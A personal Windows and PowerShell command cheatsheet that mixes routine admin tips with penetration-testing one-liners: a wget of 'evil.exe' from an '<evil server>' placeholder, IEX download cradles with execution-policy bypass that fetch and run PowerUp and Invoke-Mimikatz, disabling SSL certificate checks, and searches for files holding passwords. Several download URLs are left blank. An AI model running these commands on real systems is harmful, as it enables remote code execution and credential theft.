Windows Command Line Cheatsheet

Enable ISE using powershell

In the few months that I've been developing powershell, I've found the ISE to be incredibly useful. If you get on a new machine and the ISE isn't there, here's how you can get it going in the powershell terminal:

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

Securely store credentials in XML for Import

Start out by storing your username and password (in a SecureString format) in a PSCredential object:

$cred = Get-Credential

Next, go ahead and export your credentials to an xml file:

$cred | Export-CliXml <location>.clixml

Finally, when you need it, go ahead and import the credentials from the xml file and stored them in a variable ($cred2 in this particular scenario):

$cred2 = Import-CliXml <location>.clixml

List local accounts on a system

Get-WmiObject -Class Win32_UserAccount -Filter  "LocalAccount='True'"  


wget http://<evil server>/evil.exe -Outfile evil.exe

Download PowerUp with Powershell <= v.2.0

This will get you the PowerUp powershell script and put it in C:\Temp, or some folder that the user you're on has permissions to write to.

You can also modify this snippet to download files if wget isn't available.

$WebClient = New-Object System.Net.WebClient

one-liner alternative:

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\PowerUp.ps1")

Using PowerUp

import-module c:\PowerUp\powerup.ps1
# Run all the checks

PowerUp one-liner

Get PowerUp, run it, and output to a text file so we can read the output easily.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks > C:\Temp\PU.txt

Check Permissions for folder

icacls <path>

Powershell MimiKatz

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz

Netstat with find

This is an example of what I equate to running netstat and piping the results through grep in linux. In powershell however, you need to escape the double ticks or it will throw an error:

netstat -anob  | find `"443`"

Output to text file

Append this to whatever you're running to get the output in a text file:

| Out-File <location>

For example, if we want to run Invoke-AllChecks from PowerUp and output in a file called output.txt in C:\temp:

Invoke-AllChecks | Out-File C:\temp\output.txt

Tail a logfile

You can effectively tail -f the last two lines from a log file with the following:

Get-Content logfile.log -Tail 2 –Wait

Run Powershell Script to get around execution of scripts disabled error

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download sysinternals via powershell

First you need to ignore ssl trust

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

then you can download it

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\")

One-liner to check if system is joined to a domain or workgroup

if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on
 a domain' } else { write-host -fore red 'This system is part of a workgroup' }

Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Useful cmd one-liners:

Open event viewer from cmd: eventvwr
View the status of a service: sc query <service name>
Stop service: sc stop <service name>
Start service: sc start <servicename>
Open services msc: services.msc
List tasks: tasklist
Kill a process by PID: taskkill /pid <pid> /f
Kill firefox (or any process) by name: taskkill /im firefox.exe /f
Delete a file: del <file name>

Useful powershell one-liners:

Get hostname: $env:computername